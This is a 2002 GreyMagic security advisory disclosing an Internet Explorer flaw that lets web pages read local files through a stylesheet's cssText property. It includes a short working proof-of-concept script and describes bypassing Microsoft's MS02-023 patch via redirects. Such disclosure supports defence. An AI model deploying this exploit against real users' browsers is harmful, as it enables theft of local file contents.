Products::Security::Contact

• Security
  • News
  • Vulnerabilities
    • Internet Explorer
    • Opera
    • Other
    • Mozilla Firefox
  • Online Tools
    • Script Decoder
  • Subscribe
• Products
  • Composica Enterprise
• Contact

GreyMagic Security Advisory GM#004-IE

By GreyMagic Software, Israel.
02 Apr 2002.

Topic: Reading portions of local files, depending on structure.

Discovery date: 18 Feb 2002.

Affected applications:

All tested versions of Microsoft Internet Explorer (IE5+).

Introduction:

Cascading Style Sheets (CSS) are a way to control how HTML elements look, it enables developers to separate content (HTML) from style.

CSS can be embedded in a number of ways, one of them is to use an external file and link it to a document; this is done by utilizing the <link> element or the seldom used @import CSS rule.

Discussion:

Using the cssText property of the styleSheet object it is possible to read portions (and sometimes whole) files, from local or remote locations.

Almost any file that contains a curly-bracket ("{") character will be parsed by IE's CSS engine, it is then possible to read parts of the content using the cssText property.

The problem is that invalid CSS attributes are kept within the cssText property even though they have no functional use, allowing malicious programmers access to that content.

The problem is very apparent in C-style code files (Java, Perl, C#, etc.) and in configurations for many services (such as DNS, for example).

Update (17-May-2002):

Microsoft finally released a patch for this vulnerability. Unfortunately, in some systems, it is extremely weak. It's possible to circumvent Microsoft's new "protection" by using a URL that redirects to local files instead of accessing the local files directly.

A new demonstration, which retrieves local files even with MS02-023 installed has been added. Just click the "Redirect and Sniff" button instead of the old "Sniff" one.

Exploit:

This example attempts to read content from "c:/test.txt".

<link id="oFile" rel="stylesheet" href="file://c:/test.txt" disabled>
<script language="jscript">
onload=function () {
    alert(document.styleSheets.oFile.cssText || "Could not extract any text from file.");
}
</script>

For the above exploit to work after MS02-023 has been applied, simply assign a URL that will redirect to "file://c:/test.txt" in the "href" attribute.

Solution:

Microsoft was first informed on 18 Feb 2002 (44 days ago), they have opened an investigation regarding this issue and will probably release a patch in the near future.

Until a patch becomes available the only workaround is to disable Active Scripting.

Tested on:

IE5 NT4.
IE5.5 Win98.
IE5.5 NT4.
IE6 Win2000.
IE6 WinXP.

Demonstration:

After installing MS02-023 the "Sniff" button should give you "Access is denied". However, "Redirect and Sniff" will still give you the file contents (or "Could not extract any text from file" if it's not structured correctly):

Status: Waiting.

Disclaimer:

The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.

Vulnerability details are provided strictly for educational and defensive purposes.

GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Stay informed:

Subscribe to GreyMagic's early notification email service and be informed of new vulnerabilities and updates as soon as they appear on the site.

Press here to subscribe.

Your privacy is important to us, read our Privacy Statement.

Copyright © 2008 GreyMagic Software